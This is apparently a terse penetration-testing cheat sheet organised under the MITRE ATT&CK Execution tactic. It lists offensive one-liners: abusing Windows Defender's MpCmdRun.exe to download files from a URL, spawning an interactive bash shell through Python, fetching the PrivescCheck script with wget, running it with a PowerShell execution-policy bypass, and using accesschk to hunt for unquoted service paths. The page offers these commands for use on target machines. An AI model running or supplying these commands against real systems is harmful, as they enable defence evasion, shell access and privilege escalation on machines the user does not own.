Mitre Att&ck Entreprise: TA0002 - Execution
Menu
dl
dl = download
- /sys/powershell#transfer-http
- /dev/snippet#python-dl
- juggernaut-sec
# download C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>
rshell
# run bash via python
python -c 'import pty; pty.spawn("/bin/bash")'
escalation
# download privescCheck.ps1
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
# extended execution + txt report
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"
# unquoted service path
accesschk /accepteula -uwdq "C:\Program Files\Unquoted Service Path"
accesschk /accepteula -uwdq "C:\Program Files (x86)\Windows Identity Foundation\v3.5\"